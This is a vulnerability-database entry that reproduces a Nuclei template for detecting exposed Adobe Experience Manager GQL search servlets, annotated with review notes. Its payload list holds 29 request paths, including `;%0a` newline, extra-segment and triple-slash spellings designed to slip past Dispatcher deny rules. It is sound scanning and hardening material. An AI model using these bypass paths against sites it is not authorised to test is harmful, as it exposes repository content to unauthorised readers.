aem-gql-servlet: AEM GQLServlet

日期: 2025-08-01 | 影响软件: AEM GQLServlet | POC: 已公开

漏洞描述

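AEM GQLServlet is exposed: the GQL search servlet under `/bin/wcm/search/gql` answers queries sent over HTTP. The template below reports a host when one of its requests comes back with status 200 and a body containing the search-result fields `hits`, `path` and `excerpt`.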

PoC代码[已公开]

# Nuclei template that reports hosts where the AEM GQL search servlet returns
# results to the requests defined in the http section.
id: aem-gql-servlet

info:
  name: AEM GQLServlet
  author: dhiyaneshDk,prettyboyaaditya
  # The check only confirms that the servlet returned search results.
  # NOTE(review): real impact depends on what the repository lets the
  # requesting session read - triage each hit against the instance's ACLs.
  severity: low
  # NOTE(review): no remediation is recorded in this template. The usual
  # hardening for an exposed /bin servlet is to deny the path at the front-end
  # filter (AEM Dispatcher) and restrict it to authenticated users - confirm
  # against Adobe's current guidance.
  description: AEM GQLServlet is exposed.
  reference:
    - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html
  classification:
    # Every field after the product name is a wildcard, so the finding is not
    # tied to a particular AEM release.
    cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
  metadata:
    # Upper bound on requests per target; matches the 29 entries under
    # http.payloads.paths.
    max-request: 29
    vendor: adobe
    product: experience_manager
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,misconfig,vuln

# One GET request per entry in payloads.paths, each appended to the target's
# base URL. No headers or credentials are defined, so a match means the
# servlet answered a request that carried none.
http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"

    payloads:
      # All entries address the same search endpoint with a one-result query
      # (NOTE(review): `limit:..1` presumably caps the result set - confirm).
      # The first entry asks for type:User, the rest for type:base.
      # The spellings differ only in URL shape: plain path, `.servlet.json`,
      # an extra path segment after `gql.json`, `;%0a` followed by a
      # static-looking file name, and each of those again with tripled slashes.
      # NOTE(review): these look like checks of whether the front-end filter
      # normalises the URL before applying its deny rules; when writing or
      # auditing those rules, cover every form listed here, not only the
      # plain path.
      paths:
        - "/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico"
        - "/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix="
        - "/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix="
        - "/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix="
        - "/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix="
        - "/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix="
        - "/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix="
        - "/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix="
        - "/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix="
        - "/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix="
        - "/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix="
        - "/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix="
        - "/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix="
        - "/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix="
        - "/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix="
        # Same set again with every separator written as three slashes.
        - "///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix="
        - "///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix="
        - "///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix="
        - "///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix="
        - "///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix="
        - "///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix="
        - "///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix="
        - "///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix="
        - "///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix="
        - "///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix="
        - "///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix="
        - "///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix="
        - "///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix="
        - "///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix="
    # Stop after the first path that matches, so a positive host usually
    # receives fewer than the full 29 requests. The reported URL shows which
    # spelling got through.
    stop-at-first-match: true

    # Both matchers below must pass for a request to count as a match.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # All three words must be present (condition: and). No `part` is set,
      # so nuclei's default part (the response body) is searched.
      # NOTE(review): the words are short and generic, so any 200 page that
      # happens to contain all three would match. Verify hits by hand, or
      # consider anchoring on the JSON key form and the response content type
      # once checked against a real servlet response.
      - type: word
        words:
          - 'excerpt'
          - 'path'
          - 'hits'
        condition: and
# NOTE(review): the `# digest:` line that follows looks like a nuclei template
# signature; it presumably stops verifying once the file is edited, so re-sign
# the template before relying on signed-template checks.
# digest: 4b0a00483046022100975a76259879928d65d7a4bf42bb76bc91ac1b5f5bcf56782733801b580b4556022100e2ed9d61c3a8a7def79fba7e2e0c56d4bd59eabd957f662602e9edb98fa84a3c:922c64590222798bb761d5b6d8e72950